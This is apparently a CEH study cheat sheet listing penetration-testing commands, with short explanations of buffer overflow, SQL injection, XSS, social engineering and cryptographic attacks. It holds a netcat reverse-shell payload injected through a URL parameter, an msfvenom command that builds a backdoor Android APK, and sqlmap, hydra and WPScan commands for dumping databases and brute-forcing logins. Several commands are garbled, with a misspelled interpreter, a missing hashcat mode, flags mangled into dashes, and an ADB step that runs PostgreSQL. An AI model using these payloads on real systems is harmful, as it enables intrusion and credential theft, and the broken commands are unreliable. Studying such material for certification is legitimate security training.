Practical Notes on CEH (Certified Ethical Hacker)

Practical Notes on CEH (Certified Ethical Hacker)

Introduction: Certified Ethical Hacker (CEH) is a certification program that equips individuals with the skills needed to identify and counteract potential security threats. In this article, we will delve into various tools and techniques commonly used in ethical hacking.

Network Enumeration:

Nmap Commands:

- Enumerate Hostname: nmblookup -A [ip]

- List Shares: smbmap -H [ip/hostname]

- Check Null Sessions:

- smbmap -H [ip/hostname]

- rpcclient -U "" -N [ip]

- smbclient \\\\[ip]\\[share name]

- Check for Vulnerabilities: nmap --script smb-vuln* -p 139,445 [ip]

- Overall Scan: enum4linux -a [ip]

Web Application Testing:

CEWL:

- CEWL Function: Generate wordlist from a website’s wording.

- How to Use CEWL:

- cewl -m 4 -w wordlist.txt http://10.10.10.10

- cewl.exe example.com -m 5 -w words.txt

Fuzzing:

- gobuster -e -u http://10.10.10.10 -w /usr/share/wordlists/medium.txt

- dirb http://10.10.10.10 /usr/share/wordlists/medium.txt

Password Cracking:

Hashcat:

- Crack Hash Value to Plaintext:

- hashcat -m 5600 ntlmhash.txt rockyou.txt --force

- hashcat.exe -m hash.txt rockyou.txt -O

- Crack NTLMv2:

- hashcat -m 5600 ntlmhash.txt rockyou.txt --force

- hashcat.exe -m hash.txt rockyou.txt -O

ADB and PhoneSploit:

- Install ADB: apt-get install adb

- Clone PhoneSploit: git clone github.com/01010000/phonesploit

- Run PhoneSploit: pyhton3 phonesploit.py

- Connect to a new phone, access shell, and perform commands.

SQL Injection:

SQLMap:

- Database Enumeration:

- sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs --batch

- Table Enumeration:

- sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables --batch

- Column Enumeration:

- sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns --batch

- Retrieve All Data:

- sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --dump --batch

URL Shell:

- php?cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.2.10.111 4051 >/tmp/f

Steganography:

Tools:

- OpenStego:

openstego extract -sf openstego.png -p abcd -xf output.txt

- (Leave out -xf to create a file with the original name)

- Stegsolve:

- wget http://www.caesum.com/handbook/Stegsolve.jar -O stegsolve.jar

- java -jar stegsolve.jar

- Stego Toolkit: https://github.com/DominicBreuker/stego-toolkit

Password Cracking:

John the Ripper:

- MD5:

- john --format=raw-md5 password.txt

Hydra:

Brute Force using Hydra:

- FTP: hydra -l root -P passwords.txt [-t 32] <IP> ftp

- MySQL: hydra -L usernames.txt -P pass.txt <IP> mysql

- RDP: hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>

Web Vulnerability Scanners:

WPScan:

- Brute Force Username/Password Login:

- wpscan --url http://10.10.10.10/ -U 'admin' -P /usr/share/wordlists/medium.txt

- Normal Scanning:

- wpscan --url <URL>

- Enumerate Users:

- wpscan --url https://10.10.10.10/ --enumerate u

Skipfish:

- Web Vulnerability Scanning Tool.

Uniscan:

- Web Vulnerability Scanner: /usr/share/uniscan/report

Hashing and Encryption:

HashCalc:

- Calculate hash, checksum, and HMAC values.

CryptoForge:

- Encryption and Decryption tool.

VeraCrypt:

- Breaking VeraCrypt: Obtaining and Extracting On-The-Fly Encryption Keys.

Cryptool:

- Cryptography Analysis Tool.

Android Hacking:

MSFVenom for Android:

- Generate Android Meterpreter Payload:

- msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik lhost=ip R>Desktop/Backdoor.apk

ADB Commands:

- Start ADB Service: service postgresql start

Steganography and Hashing:

SNOW.EXE — Steganography Tool

SNOW.EXE is a steganography tool used to hide information within text files. It employs the “Whitespace Steganography” method, concealing information within spaces and tabs in text files.

Usage Example:

SNOW.EXE -C -p "hidden_message" -m "coverfile.txt" -o "outputfile.txt"

- -C : Specifies the concealment mode.

- -p "hidden_message" : The message to be concealed.

- -m "coverfile.txt" : The cover file where the hidden message will be stored.

- -o "outputfile.txt" : Output file name.

Magic Number Analysis:

Every file type typically begins with specific “magic numbers” that help identify the file type. The following command analyzes the magic numbers of a given file:

file [file_name]

Hash Analysis:

Manual Hash Analysis:

Using name-that-hash :

apt install name-that-hash
nth — — text [hash]

This tool identifies the hash type based on the entered hash value.

Using hashcat and john :

john — wordlist=/usr/share/wordlists/rockyou.txt — format=raw-sha512 hash.txt
hashcat -m 1700 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

These commands are used to crack a specific hash type.

Web Security Analysis:

Brute Force with Burp Suite:

Burp Suite is employed for brute-force attacks on websites. Relevant requests are captured, and attack strings are applied to specific fields.

Network Traffic Analysis with Wireshark:

Wireshark is used to capture and analyze network traffic. Passwords and other sensitive information can be intercepted using this method.

Advanced Exploitation Techniques:

Buffer Overflow Exploitation:

Buffer overflow occurs when more data is put into a buffer than it can handle, causing data to overflow into adjacent storage. This can be exploited to execute arbitrary code.

Steps for Exploitation:

- Identify Vulnerable Software: Use tools like fuzzers to discover buffer overflow vulnerabilities.

- Craft the Exploit: Develop a payload that includes malicious code to be executed.

- Control EIP (Extended Instruction Pointer): Overwrite the EIP to control the flow of the program.

- Execute Payload: Direct the program to execute the payload, leading to potential system compromise.

SQL Injection:

SQL Injection is a technique where an attacker inserts or “injects” a SQL query via the input data from the client to the application.

Exploitation Techniques:

- Union-Based SQL Injection: Using the UNION SQL operator to combine the results of two or more SELECT statements into a single result.

- Error-Based SQL Injection: Involves intentionally causing SQL errors to gather information about the database structure.

- Blind SQL Injection: No data is transferred via the web application, and the attacker interacts with the database by asking true or false questions.

Cross-Site Scripting (XSS):

XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users.

Types:

- Stored XSS: The script is permanently stored on the target servers.

- Reflected XSS: The script is reflected off the web server.

- DOM-Based XSS: The vulnerability exists in the client-side code rather than the server-side code.

Social Engineering:

Social engineering involves manipulating people into breaking normal security procedures.

Common Techniques:

- Phishing: Deceptive emails and websites to trick individuals into revealing personal information.

- Pretexting: Creating a fabricated scenario to steal someone’s personal information.

- Baiting: Offering something enticing to steal personal information or infect systems with malware.

Cryptographic Attacks:

Types:

- Cipher Text-Only Attack: The attacker has access only to a collection of cipher texts.

- Known Plaintext Attack: The attacker has both the plaintext and its encrypted version.

- Chosen Plaintext Attack: The attacker can encrypt plaintexts of their choice and study the ciphertexts.